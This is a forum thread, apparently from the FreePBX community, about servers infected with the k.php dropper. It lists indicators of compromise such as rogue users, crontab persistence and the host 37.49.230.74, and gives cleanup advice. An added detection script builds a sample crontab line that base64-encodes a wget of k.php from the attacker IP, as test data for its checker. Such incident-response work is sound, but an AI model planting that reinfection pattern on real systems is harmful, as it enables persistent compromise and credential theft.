If you were impacted by the restapps security regression a week or two ago, it is possible you were hit with a PHP script that is currently labeled “k.php”. If you want to see if you were compromised by this script, I’ve included some content below that you can check. I do not claim to have identified everything, but I’m hoping this might help someone.
Anyways, here are the places you can look.
crontab -e -u root → if this line exists, you’re compromised. DO NOT run this for testing.
cat /etc/shadow → if these users exist, you’re compromised.
bad users → supports, supermaint, sugarmaint
The following files will contain bad content that runs a wget to re-download k.php and re-infect your system. You have to echo the file content and pipe to base64 -d if you want to read it, but here are some of the files that you will find that contain bad content.
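Added example, not code from the thread: a read-only shell check for the indicators named in this post and later replies (the three added users, the 37.49.230.74 host and k.php). It works on file paths so it can be run against copies of /etc/passwd and crontab dumps, and the `demo` function runs it over constructed sample data.

```shell
#!/bin/sh
# Added example, not from the thread: read-only checks for the indicators the
# posts name. Each check takes a file path so it can be pointed at copies of
# /etc/passwd and crontab dumps (crontab -l -u root > root.cron) from a suspect box.

BAD_USERS="supports supermaint sugarmaint"   # users named in the thread
BAD_IP="37.49.230.74"                        # host named in the thread
BAD_SCRIPT="k.php"                           # dropper name from the thread

# check_users PASSWD_FILE: print each indicator user present; status 1 if any.
check_users() {
  hits=0
  for u in $BAD_USERS; do
    if grep -q "^$u:" "$1"; then echo "user: $u"; hits=1; fi
  done
  return $hits
}

# check_cron CRONTAB_DUMP: print lines referencing the IP or k.php, either in
# clear text or inside a base64 blob (the persistence line hides its wget that
# way, so a plain grep for the IP is not enough); status 1 if any.
check_cron() {
  hits=0
  while IFS= read -r line; do
    blob=$(printf '%s' "$line" | grep -o '[A-Za-z0-9+/=]\{16,\}' | head -n 1)
    [ $(( ${#blob} % 4 )) -eq 0 ] || blob=""      # skip paths that merely look like base64
    decoded=$(printf '%s' "$blob" | base64 -d 2>/dev/null || true)
    case "$line $decoded" in
      *"$BAD_IP"*|*"$BAD_SCRIPT"*) echo "cron: $line"; hits=1 ;;
    esac
  done < "$1"
  return $hits
}

# demo: run both checks on constructed sample files (not real artefacts).
demo() {
  d=$(mktemp -d)
  printf 'root:x:0:0:root:/root:/bin/bash\nsupermaint:x:1001:1001::/home/supermaint:/bin/bash\n' > "$d/passwd"
  enc=$(printf 'wget http://%s/%s' "$BAD_IP" "$BAD_SCRIPT" | base64)
  printf '0 3 * * * /usr/bin/updatedb\n* * * * * echo %s | base64 -d\n' "$enc" > "$d/crontab"
  check_users "$d/passwd" || echo "=> indicator users present"
  check_cron "$d/crontab" || echo "=> persistence cron line present"
  rm -rf "$d"
}

if [ "${1:-}" = demo ]; then demo; fi
```

Run with `sh check.sh demo` to see it on the sample data, or call `check_users` / `check_cron` on files copied from the affected system.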
Same problem, same IP, same files + freepbx_engine.php.
Attention: the script seems to steal the FreePBX backups and the passwords contained in them.
The strange thing is that no calls have been made and the malicious code does not compromise any functionality of freepbx. It seems like some preparatory stuff.
I would not trust any of your backups, as they contain a lot of content that has been compromised and you don’t know if your asterisk files have been tampered with or not. So, you will need to reinstall. I would advise completing all of your security steps upon fresh install - new creds, new certs, etc. ** Correction: You might have a good backup from early December you can load from, but you’ll want to validate it **
That said, there are aspects of your system you can pull out en masse without concern. If you use bulk handler for your extensions, use new secrets.
I know it’s technically possible to clean out what has been infected, but given the scope, you will never really have that peace of mind of knowing the system is clean again. Because the hack adds linux users, they can access the system and load who knows what else and cover their tracks.
Hi everybody!
I caught this shit with a bonus feature - the command line is inaccessible after login without FreePBX being able to connect to IP 37.49.230.74.
After analysis I tried to clean the system with the following commands:
Just found a system tonight with this and spent about 2 hours tracing out the file. Was able to interrupt the program by editing the /var/www/html/admin/modules/freepbx_ha/license.php file and removing the line that re-writes root crontab.
I then discovered this was also in asterisk’s crontab and removed it from there as well.
This seems to have stopped the loop of re-installing.
Crap, it looks like most of my systems got hit by this… I only have two weeks of backups so I can’t do that. Is there any official way to clean this mess off a system?
Which passwords/secrets? Just the phone system one, or system root passwords etc.?
I don’t know much about iptables, but putting 37.49.230.74 in the blacklist of the firewall doesn’t seem to stop outbound connections to the hackers’ server.
Can anyone post the rules needed to stop the script connecting? I can see the outbound connections keep happening using netstat.
I don’t have such problems.
Try changing the repos to another mirror:
fwconsole setting MODULE_REPO https://{mirror or mirror1}.freepbx.org
Then yum update and reboot.
After logon you need to block access to IP 37.49.230.74 and try to clean up.
If you edit /var/www/html/admin/modules/freepbx_ha/licence.php and remove all the commands except the delete users command, then save it and delete the line from the root crontab and asterisk crontab, it should stop the cycle…